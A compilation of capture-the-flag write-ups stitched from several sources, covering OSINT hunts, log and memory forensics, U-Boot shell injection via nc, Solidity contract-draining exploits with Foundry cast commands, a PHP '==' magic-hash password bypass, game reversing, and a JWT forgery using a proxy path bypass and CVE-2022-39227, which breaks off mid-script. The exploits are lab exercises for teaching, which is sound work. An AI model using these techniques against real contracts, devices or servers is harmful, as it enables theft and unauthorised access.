## Solution:Searching by the group name and the group logo doesn't seem very useful: ![search_byname_and_logo](https://github.com/vjz3r/CTF-WRITEUP/assets/83077449/4f43b279-e54d-4377-9d34-8e6726634e5b) Hmmm reading the information in the "About Us" section also provides a lot of useful information here. I tried searching for it on Google and found an article about this group: ![Search_by_aboutus](https://github.com/vjz3r/CTF-WRITEUP/assets/83077449/c2b71b7e-57ca-42cc-b94e-f3c37f118d6d)https://thecyberexpress.com/new-wolphv-ransomware-group-on-the-dark-web Accessing the article, we immediately have the Twitter account name of this group: ``wolphvgroup``.At first, I didn't pay much attention to it because in the title, there was a note: ``NOTE: Wolphv's Twitter/X account and https://wolphv.chal.wolvsec.org/ are out of scope for all these challenges. Any flags found from these are not a part of these challenges`` So I thought it might just have fake flags like on the website. After about 3 hours of searching for more articles about this group and finding nothing ? And my friend found the flag in the comments section of this post :Đ https://twitter.com/FalconFeedsio/status/1706989111414849989 Here is the Flag:![flag](https://github.com/vjz3r/CTF-WRITEUP/assets/83077449/d6a11cb7-b5c5-4fc9-a37e-4626513a3e9a)### Flag: ``wctf{0k_1_d0nT_th1Nk_A1_w1ll_r3Pl4c3_Us_f0R_4_l0ng_t1me}``
**[Hardware - Rids](https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-hardware-a45ddedae49b#72e1)** https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-hardware-a45ddedae49b#72e1
> A new ransomware group you may have heard about has emerged: WOLPHV> > There’s already been reports of their presence in articles and posts.> > NOTE: Wolphv’s twitter/X account and https://wolphv.chal.wolvsec.org/ are out of scope for all these challenges. Any flags found from these are not a part of these challenges> > This is a start to a 5 part series of challenges. Solving this challenge will unlock WOLPHV II: Infiltrate We came to the question that exhausted me the most but was easy. ? The question actually gives us a hint in the Twitter accounts and says that a domain is not related to this question. This leads us not to follow up and look at Twitter, but not everything is true. Let’s look at Twitter with a simple Google search then. ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-54.png) Twitter [link](https://twitter.com/FalconFeedsio/status/1706989111414849989). ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-55.png) We decode base64. ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-56.png) `wctf{0k_1_d0nT_th1Nk_A1_w1ll_r3Pl4c3_Us_f0R_4_l0ng_t1me}`
> Since the WOLPHV twitter/x is out of comission now, I wonder where else the official WOLPHV group posts on social media. Maybe we can also infiltrate what they use to message each other> > NOTE: Wolphv's twitter/X account and https://wolphv.chal.wolvsec.org/ are out of scope for all these challenges. Any flags found from these are not a part of these challenges> > Solving this challege will unlock WOLPHV III, WOLPHV IV, and WOLPHV V We need to search for a social media account, again we do a simple search and discover a Facebook page.![](https://margheritaviola.com/wp-content/uploads/2024/03/image-57.png) When we check his Facebook account, we come across a video. If we pause the video while closing the screen sharing at the end of the video, we find a discord channel.![](https://margheritaviola.com/wp-content/uploads/2024/03/image-59.png) ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-58.png) We join the channel and find the flag.![](https://margheritaviola.com/wp-content/uploads/2024/03/image-60.png) `wctf{r0t_52_w0ulD_b3_cr4zy_fRfr}`
> Hi there incident responder. So we have this company that was breached sometime last week, but their SOC team only keeps HTTP request logs ? We took down all of our wolvsecsolutions websites as a precaution.> > Maybe there’s still a way to figure out what happened? Why did they click on a suspicious link? Somebody told me there’s a flag on the link now? We parse logs containing the keyword wolvsecsolutions. You can use an editor to do this. I used sublimetext. (Ctrl+L to get the selected keywords as a complete row) [Link for sublimetext video](https://margheritaviola.com/2024/03/20/wolvctf-forensics-log-analysis-writeup/). Here I delete frequently used hosts for example dev.wolvsecsolutions.[Link for sublimetext video](https://margheritaviola.com/2024/03/20/wolvctf-forensics-log-analysis-writeup/). One of the remaining hosts draws our attention. ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-61.png) ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-62.png) `wctf{ph1sh3r5_l0v3_c0py1ng_d0m41n_n4m35}`
### IoT - Baby's First IoT Flag 4 Submit the command used in U-Boot to look at the system variables to port 1337 as a GET request ex. http://35.225.17.48:1337/{command}. This output is needed for another challenge. There is NO flag for this part. Submit the full command you would use in U-Boot to set the proper environment variable to a /bin/sh process upon boot to get the flag on the webserver at port 7777. Do not include the ‘bootcmd’ command. It will be in the format of "something something=${something} something=something" Submit the answer on port 9123. 1) For looking system variables in U-boot we need to use `printenv` command Send `printenv` command with cURL to port 1337 `curl http://35.225.17.48:1337/printenv ` addmisc=setenv bootargs ${bootargs}console=ttyS0,${baudrate}panic=1 baudrate=57600 bootaddr=(0xBC000000 + 0x1e0000) bootargs=console=ttyS1,57600 root=/dev/mtdblock8 rts_hconf.hconf_mtd_idx=0 mtdparts=m25p80:256k(boot),128k(pib),1024k(userdata),128k(db),128k(log),128k(dbbackup),128k(logbackup),3072k(kernel),11264k(rootfs) bootcmd=bootm 0xbc1e0000 bootfile=/vmlinux.img ethact=r8168#0 ethaddr=00:00:00:00:00:00 load=tftp 80500000 ${u-boot} loadaddr=0x82000000 stderr=serial stdin=serial stdout=serial Environment size: 533/131068 bytes Read U-boot variables and use `setenv bootargs=${bootargs} init=/bin/sh` for setting the proper environment variable to a /bin/sh process. And send to port 9123! `printf 'setenv bootargs=${bootargs} init=/bin/sh\n\0' | nc 35.225.17.48 9123` Enter the command you would use to set the environment variables in U-Boot to boot the system and give you a shell using /bin/sh: Access granted! The Flag is {Uboot_Hacking}! FLAG: {Uboot_Hacking}
> I get that the attackers were in my PC, but how did they achieve persistence? We use the OSForensics tool to do forensics in our.DMP file. The free version will do the job. We use the Hex/String Viewer feature to look at the detailed contents of the file and here we notice the base64 code.![](https://margheritaviola.com/wp-content/uploads/2024/03/image-67.png) When we decode Base64, we get the Pastebin link and if we go to the link, we reach the flag.![](https://margheritaviola.com/wp-content/uploads/2024/03/image-68.png) ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-69.png) `wctf{v0lAt1l3_m3m0ry_4qu1r3D_a3fe9fn3al}`
**[Hardware - Maze](https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-hardware-a45ddedae49b)** https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-hardware-a45ddedae49b
Bad Fiat-Shamir on the quicksilver S matrix allows for proof forgery on arbitrary statements.Full writeup: https://ur4ndom.dev/posts/2024-03-18-breakfaest/
## Lucky Faucet [easy] ### Description `The Fray announced the placement of a faucet along the path for adventurers who can overcome the initial challenges. It's designed to provide enough resources for all players, with the hope that someone won't monopolize it, leaving none for others.` ### Initial AnalysisLike the `Russian Roulette` challenge, HTB spawned two Docker containers and provided a .zip file containing smart contracts, `Setup.sol` and `LuckyFaucet.sol`. I began by looking at `Setup.sol`. ### Setup.sol ```solidity// SPDX-License-Identifier: UNLICENSEDpragma solidity 0.7.6; import {LuckyFaucet} from "./LuckyFaucet.sol"; contract Setup { LuckyFaucet public immutable TARGET; uint256 constant INITIAL_BALANCE = 500 ether; constructor() payable { TARGET = new LuckyFaucet{value: INITIAL_BALANCE}(); } function isSolved() public view returns (bool) { return address(TARGET).balance <= INITIAL_BALANCE - 10 ether; }}``` `Setup.sol` creates a new `LuckyFaucet` contract called `TARGET` with the initial balance of 500 ether. To solve the challenge, I needed to transfer at least 10 ether out of the `TARGET` contract to reduce its balance to 490 ether or less. Next, I examined `LuckyFaucet.sol`. #### LuckyFaucet.sol ```solidity// SPDX-License-Identifier: MITpragma solidity 0.7.6; contract LuckyFaucet { int64 public upperBound; int64 public lowerBound; constructor() payable { // start with 50M-100M wei Range until player changes it upperBound = 100_000_000; lowerBound = 50_000_000; } function setBounds(int64 _newLowerBound, int64 _newUpperBound) public { require(_newUpperBound <= 100_000_000, "100M wei is the max upperBound sry"); require(_newLowerBound <= 50_000_000, "50M wei is the max lowerBound sry"); require(_newLowerBound <= _newUpperBound); // why? because if you don't need this much, pls lower the upper bound :) // we don't have infinite money glitch. upperBound = _newUpperBound; lowerBound = _newLowerBound; } function sendRandomETH() public returns (bool, uint64) { int256 randomInt = int256(blockhash(block.number - 1)); // "but it's not actually random ?" // we can safely cast to uint64 since we'll never // have to worry about sending more than 2**64 - 1 wei uint64 amountToSend = uint64(randomInt % (upperBound - lowerBound + 1) + lowerBound); bool sent = msg.sender.send(amountToSend); return (sent, amountToSend); }}``` A `LuckyFaucet` contract contains two functions: `setBounds()` and `sendRandomETH()`. `setBounds()`accepts two 64-bit integers as parameters to represent the new `lowerBound` and `upperBound` values where `lowerBound` cannot exceed `upperBound` and the maximum amount of wei for each variable is limited to 50 million wei and 100 million wei respectively. Given there is 10^18^ wei in one ether, the initial bounds are much too small to achieve the goal of transferring 10 ether in a reasonable amount of time. The solution is to figure out a way to make transferring more ether at a team possible. ### SolutionWith `lowerBound` and `upperBound` existing as signed integers or `int64`, a significantly large negative `lowerBound` value can be set and would result in a large `amountToSend` for `sendRandomETH()`. Even if the result of `upperBound - lowerBound + 1) + lowerBound` is a large negative number, the contract casting it to an unsigned integer or `uint64` will result in a positive number. With this principle in mind, I set up my Foundry-rs Docker container ([Foundry](https://github.com/foundry-rs/foundry)) with the proper environment variables provided by HTB. ```bash$ nc 94.237.63.2 386941 - Connection information2 - Restart Instance3 - Get flagaction? 1 Private key : 0xa26192c31c6a9630bda5f0da49d5910a57ff3d25523ed0daaba2fa86ee34ecf0Address : 0x6E4169b7A6c32528D49835CFdb1B4a6a0d27f3CfTarget contract : 0xEC9a50cbE92645C537d3645e714eDffD85055917Setup contract : 0x83630575314cFDdE1C849b4f28B806381b7A67E6 # export PK=0xa26192c31c6a9630bda5f0da49d5910a57ff3d25523ed0daaba2fa86ee34ecf0# export ATTACKER=0x6E4169b7A6c32528D49835CFdb1B4a6a0d27f3Cf# export TARGET=0xEC9a50cbE92645C537d3645e714eDffD85055917# export RPC=http://94.237.63.2:43020``` I then used Foundry's `cast` tool to call the `setBounds()` function to create a significantly negative value for `lowerBound` where `lowerBound` was `-10000000000000000` and `upperBound` was `100000000`. ```solidity# cast send --private-key $PK --rpc-url $RPC $TARGET "setBounds(int64, int64)" -- -10000000000000000 100000000 blockHash 0x61fc9b1c1d3d6cec7be31df01aad0dba01a5d2acaf583e96ae68f4b21f2414deblockNumber 2contractAddresscumulativeGasUsed 27135effectiveGasPrice 3000000000from 0x6E4169b7A6c32528D49835CFdb1B4a6a0d27f3CfgasUsed 27135logs []logsBloom 0x000000000000000000000000...rootstatus 1transactionHash 0x66ca28e9a4c26f24fb81841b133306d64f3dc971b858daa18a74404ddc991288transactionIndex 0type 2to 0xEC9a50cbE92645C537d3645e714eDffD85055917depositNonce null``` After updating the bounds, I called the `sendRandomETH()` function, which drained at least the required 10 ether from the target contract and allowed me to get the flag. ```bash# cast send --private-key $PK -f $ATTACKER --rpc-url $RPC $TARGET "sendRandomETH()" blockHash 0x9739649d9e6ba6e8c8e39fee837a831de9c5429ed4caa63e8ec8e8a1727a3c5bblockNumber 3contractAddresscumulativeGasUsed 30463effectiveGasPrice 3000000000from 0x6E4169b7A6c32528D49835CFdb1B4a6a0d27f3CfgasUsed 30463logs []logsBloom 0x000000000000000000000000...rootstatus 1transactionHash 0xc9d12df171dee3f1cd8f4620d85c22aae557d4ba583910171b9469f219aed354transactionIndex 0type 2to 0xEC9a50cbE92645C537d3645e714eDffD85055917depositNonce null``` ```bash$ nc 94.237.63.2 386941 - Connection information2 - Restart Instance3 - Get flagaction? 3HTB{1_f0rg0r_s0m3_U}```
## Forensics/Tampered (48 solves)> Our MAPNA flags repository was compromised, with attackers introducing one invalid flag. Can you identify the counterfeit flag? Note: Forgot the flag format in the rules pages, just find the tampered one. You are not allowed to brute-force the flag in scoreboard, this will result in your team being blocked. Looking through the given files, we are given a very long list of flags. Basics scan show nothing out of the ordinary in flag format or length, so I look into the newlines after each flag. I write a basic script to split all lines by the common ending `\r\r\n` and if any of the strings don't meet the expected length, to print them. ```pythonwith open('flags.txt','rb') as f: d=f.read().split(b'\r\r\n') for x in d: if x != b'': if len(x) != 47: print(x)``` ```$ python3 check.pyb'MAPNA{Tx,D51otN\\eUf7qQ7>ToSYQ\\;5P6jTIHH#6TL+uv}\r\n\rMAPNA{R6Z@//\\>caZ%%k)=ci3$IyOkSGK%w<"V7kgesY&k}’``` We can see one flag ends with `\r\n\r`, which is our out of place flag. Flag: `MAPNA{Tx,D51otN\\eUf7qQ7>ToSYQ\\;5P6jTIHH#6TL+uv}` **Files:** [tampered_6fb083f974d05371cef19c0e585ba5c59da23aa8.txz](https://web.archive.org/web/20240121174053/https://mapnactf.com/tasks/tampered_6fb083f974d05371cef19c0e585ba5c59da23aa8.txz)
# game-graphics-debugging *this is a clone. check out the original! [https://github.com/Om3rR3ich/CTF-Writeups/blob/main/WolvCTF%202024/game_graphics_debugging.md](https://github.com/Om3rR3ich/CTF-Writeups/blob/main/WolvCTF%202024/game_graphics_debugging.md)* solver: [5h4d0w ](https://github.com/Om3rR3ich) writeup-writer: [5h4d0w](https://github.com/Om3rR3ich) ## Challenge Description **Author:** ravbug **Description**: I put a flag in this game, but I can't see it! Can you find it for me? ![chall_description](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/8bfd59fa-4281-4299-b451-1da7cb87fb15) As per usual - you're given a binary (in this case, you can choose your favorite architecture), and you're supposed to find the hidden flag.Unlike many reversing challenges, there's not a clear path to the goal (e.g. pass the authentication system). ## Sometimes Broken Things Deserve to Be RepairedBefore diving into the binary, I decided to run it to get a feel for what it does: ![error_message](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/12af9638-9827-41a1-9239-2ecb289ef780) Well, it looks like some setup needs to be done to even begin reversing this. The application fails to find an expected symbol (`vkCmdPipelineBarrier2`), so it crashes.A quick google search yields that this is a function in Vulkan - a cross-platform 3D graphics API (hence the support of multiple archicterus in this challenge).Nevertheless, if you've solved `Missing Resources`, you know how these error messages can be misleading. The problem might be way deeper.To make sure, I loaded the app into IDA and debugged the execution flow.To avoid crashing (IDA defaults to running the given executable without suspending at any point), I enabled `Suspend on library load/unload` (in Debugger->Debugger options).In addition, I recommend enabling `Suspend on entry point`, to easily check whether the entry point is ever reached. ![dlls_loaded](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/698773bd-c7a3-4b90-907e-fd4e9e985d08) Don't be fooled into thinking the problematic DLL is `VCRUNTIME140_1.dll` - it causes an exception because it looks for a non-existing function. However, vulkan-1 does existin my machine and is successfully loaded (wasn't unloaded). The problem turned out to be that the application required a different version of vulkan than the one I had,but still expected it to be called `vulkan-1.dll`. Downloading the expected version of vulkan (and renaming it to vulkan-1.dll to make the program load it) results in a continuationof the execution flow. ![correct_dll_loaded](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/bc474c0d-5cb0-4f0f-a1fd-c9e18eb233a3) In general, an app will first look up a DLL in its own directory, so whenever you want to perform a little switcheroo you can simply copy your desired versionto the executable's location. ## History is mostly guessing; the rest is prejudice After fixing the app, running it resulted in the following: ![normal_execution](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/40fb0aea-6733-4abe-9c6c-7b697a59b0e7) Well, now what? Since the binary is stripped, the standard approach is to just start at the beginning (`_start`). This is the first step in a long road of pain and misery, so I'm going to skipthat attempt altogether. Are there any interesting strings (that lead to interesting parts of the source by an Xref)?YES, but for whatever reason (probably an unexpected encoding) IDA couldn't parse them correctly so they didn't show up. "Running to user code" also yielded nothing of interest. With the standard techniques out of the way, we let the guessing game begin! Fast forward to the one that actually worked, ✨ my intuition ✨ led me to believe that the flag is hidden somewhere between creating the window (when the name is still 'RavEngine' - which is the fault),and the creation of the graphics. But where is that? Since I couldn't get there by an Xref from a string, I decided to find the function that's used to change the title.As it turns out, the call to this function is very obfuscated, so looking up SDL's `SetWindowTitle` (or any of the standard functions) didn't work. In a moment of clarity, I recalled that flags are fairly commonly hidden in the TLS of the graphics (or another ) thread, so I looked for an attempt to access the TLS.As a result, discovered the following codeblock: ```cpp v21 = (__m128i *)*((_QWORD *)NtCurrentTeb()->ThreadLocalStoragePointer + (unsigned int)TlsIndex); v22 = v21[6].m128i_i32[2]; flag_arr = v21[4].m128i_i8; if ( (v22 & 1) == 0 ) { v21[6].m128i_i32[2] = v22 | 1; v21[6].m128i_i8[7] = 1; if ( flag_arr > &v161 || &v21[6].m128i_u16[3] < (unsigned __int16 *)v158 ) { *(__m128i *)flag_arr = si128; v21[5] = v20; v21[6].m128i_i32[0] = v159; v21[6].m128i_i16[2] = v160; v21[6].m128i_i8[6] = -45; } else { *(__m128i *)flag_arr = si128; v21[5] = v20; v21[6].m128i_i32[0] = v159; v21[6].m128i_i16[2] = v160; v21[6].m128i_i8[6] = -45; } _tlregdtor(&unk_7FF79A524270); } if ( flag_arr[39] ) { *flag_arr ^= 0x8Fu; flag_arr[1] ^= 0xC7u; flag_arr[2] ^= 0xFu; flag_arr[3] ^= 0x57u; flag_arr[4] ^= 0xFDu; flag_arr[5] ^= 0xDBu; flag_arr[6] ^= 0xD3u; flag_arr[7] ^= 0xC7u; flag_arr[8] ^= 0x8Fu; flag_arr[9] ^= 0xC7u; flag_arr[10] ^= 0xFu; flag_arr[11] ^= 0x57u; flag_arr[12] ^= 0xFDu; flag_arr[13] ^= 0xDBu; flag_arr[14] ^= 0xD3u; flag_arr[15] ^= 0xC7u; flag_arr[16] ^= 0x8Fu; flag_arr[17] ^= 0xC7u; flag_arr[18] ^= 0xFu; flag_arr[19] ^= 0x57u; flag_arr[20] ^= 0xFDu; flag_arr[21] ^= 0xDBu; flag_arr[22] ^= 0xD3u; flag_arr[23] ^= 0xC7u; flag_arr[24] ^= 0x8Fu; flag_arr[25] ^= 0xC7u; flag_arr[26] ^= 0xFu; flag_arr[27] ^= 0x57u; flag_arr[28] ^= 0xFDu; flag_arr[29] ^= 0xDBu; flag_arr[30] ^= 0xD3u; flag_arr[31] ^= 0xC7u; flag_arr[32] ^= 0x8Fu; flag_arr[33] ^= 0xC7u; flag_arr[34] ^= 0xFu; flag_arr[35] ^= 0x57u; flag_arr[36] ^= 0xFDu; flag_arr[37] ^= 0xDBu; flag_arr[38] ^= 0xD3u; flag_arr[39] = 0; }``` Notice anything suspicious (I put a pretty big hint XD)? It looks like some chunk of data is extracted from the TLS of the graphics thread and XORed with hardcoded values.The null byte at the end of the byte array is a dead giveaway for a string, and that string is indeed the flag.Place a breakpoint at the end of this codechunk, and examine the memory to find: ![flag_in_memory](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/d649ebdf-2150-40ad-a6ad-d26d7232f26b) The (full) flag is: **wctf{your-d3sc3nt-into-gamedev-beg1ns}**
**[Web - Flag Command](https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-web-50b31126de50#5f6b)** https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-web-50b31126de50#5f6b
**[Web - KORP Terminal](https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-web-50b31126de50#e08c)** https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-web-50b31126de50#e08c
## Russian Roulette [very easy] ### Description `Welcome to The Fray. This is a warm-up to test if you have what it takes to tackle the challenges of the realm. Are you brave enough?` ### Initial Analysis HTB spawned two Docker containers and provided a `.zip` file containing smart contracts, `Setup.sol` and `RussianRoulette.sol`. I began by looking at `Setup.sol`. #### Setup.sol ```soliditypragma solidity 0.8.23; import {RussianRoulette} from "./RussianRoulette.sol"; contract Setup { RussianRoulette public immutable TARGET; constructor() payable { TARGET = new RussianRoulette{value: 10 ether}(); } function isSolved() public view returns (bool) { return address(TARGET).balance == 0; }}``` A smart contract named `RussianRoulette` is created with 10 ether. To solve the challenge, I needed to drain `RussianRoulette` of that 10 ETH into the provided attacker wallet. #### RussianRoulette.sol ```soliditypragma solidity 0.8.23; contract RussianRoulette { constructor() payable { // i need more bullets } function pullTrigger() public returns (string memory) { if (uint256(blockhash(block.number - 1)) % 10 == 7) { selfdestruct(payable(msg.sender)); // ? } else { return "im SAFU ... for now"; } }}``` Looking at the `RussianRoulette` contract, I saw the `pullTrigger()` function which has a public state, so I could call it directly. When `pullTrigger()` is called, it:1. Calculates an unsigned, 256-bit integer from the blockhash of the transaction's block number minus one2. Modulos that value by 103. If the final value is equal to seven, the `selfdestruct()` method is called which deletes the smart contract and sends the remaining Ether to the designated contract (in this case, the transaction sender) ### Solution Before interacting with the `RussianRoulette` contract, I grabbed the connection information for the hosted testnet and exported these values as environment variables in my Foundry-rs Docker container ([Foundry](https://github.com/foundry-rs/foundry)). ```$ nc 83.136.252.250 407611 - Connection information2 - Restart Instance3 - Get flagaction? 1 Private key : 0xbf72ec411f03738614ea4ff8ca1bedcf5879ca3ce0ed3fa1be876e82ba365e0b Address : 0x23C88A40d138f6eB43C1ae1E439fB37813D13709 Target contract : 0x8b40383E4793e3C9d4e44db36E878f9D279f0522 Setup contract : 0xE7bA09fB42a91B2EbBc893d99dbD8D7C109eaf05 # export PK=0xbf72ec411f03738614ea4ff8ca1bedcf5879ca3ce0ed3fa1be876e82ba365e0b# export ATTACKER=0x23C88A40d138f6eB43C1ae1E439fB37813D13709# export TARGET=0x8b40383E4793e3C9d4e44db36E878f9D279f0522# export RPC=http://94.237.63.2:43020``` To get the right block number, I called `pullTrigger()` multiple times (15) using Foundry's `cast` tool to meet the `if` statement condition and trigger the `selfdestruct()` method to send the 10 Ether to my attacker contract. ```# cast send --private-key $PK -f $ATTACKER --rpc-url $RPC $TARGET "pullTrigger()" blockHash 0x0d7f6e70b44066fc8334a5e01e85b3db072fe849c1b450b4b7e9c2acd6dd6fe0 blockNumber 2 contractAddress cumulativeGasUsed 21720 effectiveGasPrice 3000000000 from 0x19Bd76639019aadBeeA69F5399C49e1672f5e25d gasUsed 21720 logs [] logsBloom 0x000000000000000000000000... root status 1 transactionHash 0xae0003c575c9e12b54d1e52bae664897021d73cc75e5f0acb0417ca812d6ab5e transactionIndex 0 type 2 to 0x28874aF3728F75792df75680b5c3a9ff1a8C4100 depositNonce null Repeat... # cast send --private-key $PK -f $ATTACKER --rpc-url $RPC $TARGET "pullTrigger()" blockHash 0x6ae30317307bf064493418d851a4f8350ec86003067780a035c2260233812ce4 blockNumber 16 contractAddress cumulativeGasUsed 26358 effectiveGasPrice 3000000000 from 0x19Bd76639019aadBeeA69F5399C49e1672f5e25d gasUsed 26358 logs [] logsBloom 0x000000000000000000000000... root status 1 transactionHash 0x114d561b016940ac946d493ee46d85e91ee76fea51c062b39857aaa4680920d5 transactionIndex 0 type 2 to 0x28874aF3728F75792df75680b5c3a9ff1a8C4100 depositNonce null``` With the `pullTrigger()` condition met, I was able to get the flag. ```$ nc 83.136.252.250 40761 1 - Connection information 2 - Restart Instance 3 - Get flag action? 3 HTB{99%_0f_g4mbl3rs_quit_b4_bigwin}```
# web: bassysolvers: [L3d](https://github.com/imL3d) writeup-writer: [L3d](https://github.com/imL3d) ![chall img](https://github.com/C0d3-Bre4k3rs/Nullcon2024-Writeups/raw/main/bassy/_images/chall.png?raw=true) web source code (copy): [source.php](https://github.com/C0d3-Bre4k3rs/Nullcon2024-Writeups/blob/main/bassy/files/source.php) ## Solution In this challenge we need to somehow match the admin password in order to get the flag. We don't know much about the password other than it's starting with base85 encoding starts with `0P)s`. We don't have much components in this challenge, so the vulnerability has to lie either in the base85 encoding, or the comparison. We can quickly rule out the base85 encryption, [it's source code](https://github.com/scottchiefbaker/php-base85) seems to do the job without any faults. So, the vulnerability has to be in the comparison. And as it happens, such volnerability exists in the `==` operation. The problem exists in the manner in which PHP handles handles strings when the double equal (==) operator is used to compare them, instaed of the triple equal operator (===). When using double equals, if both sides of the operation looks like strings of an int, PHP will take the initiative and evaluate their numeric value before comparing them. This doesn't happen while uisng `===`, as this operation will not convert the types of the operands. In our case, the decoded Admin Password starts with `0e1` - which is a numeric looks like a numeric value in it's scientific form. If our encoded password will also start with something that looks like a number (specifically `0`, because `0e1` in it's int form is `0`), PHP will convert those to their numric values, they will be equal, and we will bypass the check without actually knowing the password. The code to create such value, is a simple as decoding the number zero (it's encoded value will be then 0):```phpecho base85::decode("0000");```The amount of `0`s that are being decoded in this case is to make sure they will be encoded to the same value (gotta love base85?‍♂️). We send this as the password, and get the flag?: `ENO{B4sE_85_L0l_0KaY_1337}`. Thanks for reading!
You need the number of games on the database released for the playstation in the 2000’s (2000-2009 inclusive). Look through the schema to find the different tables. You'll need to join the games, gameplatforms, and platforms tables so that you can get the years from the games and the playstation qualifier from the platforms. SELECT COUNT(*) AS numgames FROM Games g INNER JOIN GamePlatforms gp ON g.gameid = gp.gameid INNER JOIN Platforms p ON gp.platformid = p.platformid WHERE p.platformname = 'PlayStation' AND YEAR(g.releasedate) >= 2000 AND YEAR(g.releasedate) <= 2009; Flag is texsaw{42}
For this question you need to look at the orderdetails table to get the subtotal and quantity of purchases to determine the revenue of a given order. You also need to link this to a specific game, group by games of the same ID, and make sure you're only looking at action games via genres table. Make sure to submit the 5th one. SELECT SUM(od.quantity \* od.subtotal) AS total_revenueFROM Orders oINNER JOIN OrderDetails od ON o.order_id = od.order_idINNER JOIN Games g ON od.game_id = g.game_idINNER JOIN Genres gn ON g.genre_id = gn.genre_idWHERE gn.genre_name = 'Action'AND YEAR(o.order_date) = 2023GROUP BY g.game_idORDER BY total_revenue DESCLIMIT 5; flag is texsaw{247.16}
The image is a photo of Richard Hamming. The entire image can be interpreted as a 65536-bit Hamming Code in SECDED (extended) mode. To find the error bit, treat the entire image as a 1D array of bits with black pixel = 1 and white pixel = 0 (the inverse will also work). Then, XOR together the **indices** of the 1 pixels, we get 19589, which corresponds to pixel (133, 76). Hence the flag is `texsaw{one_hundred_and_thirty_three_seventy_six}` A Python solution script: ```import numpy as npfrom functools import reduceimport operator as opfrom PIL import Image img = Image.open("message.bmp", "r")width, height = img.sizepixels = list(img.getdata()) def find_faulty_bit(bits): onelist = [i for i, bit in enumerate(bits) if bit] faultybit = reduce(op.xor, onelist) return faultybit fb = find_faulty_bit(pixels) print(fb)print((fb%width, fb//width))print((bin(fb%width), bin(fb//width))) ```
# Deadface CTF 2023 — Traffic Analysis ## Challenges * Sometimes IT Lets You Down* Git Rekt* Creepy Crawling* [UVB-76 (Hello, are you there?)](https://cybersecmaverick.medium.com/deadface-ctf-2023-traffic-analysis-write-ups-a53c1afd1f62#73c7)
When we open the fake xkcd website, we see an image. Downloading this image, it's named secrets.png. The image has a pixelated portion of text, when we run it through a tool called Unredacter https://github.com/BishopFox/unredacter, we get the first part of the flag `pix314te_` But that's not all. If we examine secrets.png further, we can see that it has the bytes of a TIFF image contained within it. Binwalk output: ```0 0x0 PNG image, 1184 x 1656, 8-bit grayscale, non-interlaced152 0x98 Zlib compressed data, best compression155640 0x25FF8 TIFF image data, little-endian offset of first image directory: 1960712``` Extracting the TIFF image, we see the familiar password hunter2 meme. If we examine the **redacted** parts (asterisks). At the center of each asterisk in the first set of asterisks, there is an edited pixel that looks different from their surrounding. Turning the RGB values of these pixels into ASCII characters give us the second part of the flag `asterisk_redacted_password2` The full flag is `texsaw{pix314te_asterisk_redacted_password2}`
# LockTalk In "The Ransomware Dystopia," LockTalk emerges as a beacon of resistance against the rampant chaos inflicted by ransomware groups. In a world plunged into turmoil by malicious cyber threats, LockTalk stands as a formidable force, dedicated to protecting society from the insidious grip of ransomware. Chosen participants, tasked with representing their districts, navigate a perilous landscape fraught with ethical quandaries and treacherous challenges orchestrated by LockTalk. Their journey intertwines with the organization's mission to neutralize ransomware threats and restore order to a fractured world. As players confront internal struggles and external adversaries, their decisions shape the fate of not only themselves but also their fellow citizens, driving them to unravel the mysteries surrounding LockTalk and choose between succumbing to despair or standing resilient against the encroaching darkness. ## Writeup The site use **three** different **api**: ```python@api_blueprint.route('/get_ticket', methods=['GET'])def get_ticket(): claims = { "role": "guest", "user": "guest_user" } token = jwt.generate_jwt(claims, current_app.config.get('JWT_SECRET_KEY'), 'PS256', datetime.timedelta(minutes=60)) return jsonify({'ticket: ': token}) @api_blueprint.route('/chat/<int:chat_id>', methods=['GET'])@authorize_roles(['guest', 'administrator'])def chat(chat_id): json_file_path = os.path.join(JSON_DIR, f"{chat_id}.json") if os.path.exists(json_file_path): with open(json_file_path, 'r') as f: chat_data = json.load(f) chat_id = chat_data.get('chat_id', None) return jsonify({'chat_id': chat_id, 'messages': chat_data['messages']}) else: return jsonify({'error': 'Chat not found'}), 404 @api_blueprint.route('/flag', methods=['GET'])@authorize_roles(['administrator'])def flag(): return jsonify({'message': current_app.config.get('FLAG')}), 200``` We can generate a valid **jwt** but there is a proxy rule that do not allow it: ```http-request deny if { path_beg,url_dec -i /api/v1/get_ticket }``` To bypass it, we can add one more **/**: ```http://{ip}:{port}//api/v1/get_ticket``` Now we have a valid **jwt** and we can interact with the site. To obtain the flag, need to call the **/flag** but our role need to be '**administrator**' and by default our role is **guest**: ```pythondef authorize_roles(roles): def decorator(func): @wraps(func) def wrapper(*args, **kwargs): token = request.headers.get('Authorization') if not token: return jsonify({'message': 'JWT token is missing or invalid.'}), 401 try: token = jwt.verify_jwt(token, current_app.config.get('JWT_SECRET_KEY'), ['PS256']) user_role = token[1]['role'] if user_role not in roles: return jsonify({'message': f'{user_role} user does not have the required authorization to access the resource.'}), 403 return func(*args, **kwargs) except Exception as e: return jsonify({'message': 'JWT token verification failed.', 'error': str(e)}), 401 return wrapper return decorator``` So we need to **forge** a valid **jwt** with **administrator** role. In the **requirements.txt** file we can find the version of **python_jwt**: ```uwsgiFlaskrequestspython_jwt==3.3.3``` For this version there is a **CVE** (**CVE-2022-39227**). So, now integrate the **CVE PoC** with our script: ```python#!/usr/bin/python3import requestsfrom json import loads, dumpsfrom jwcrypto.common import base64url_decode, base64url_encode ip = "94.237.58.155"port = 39169 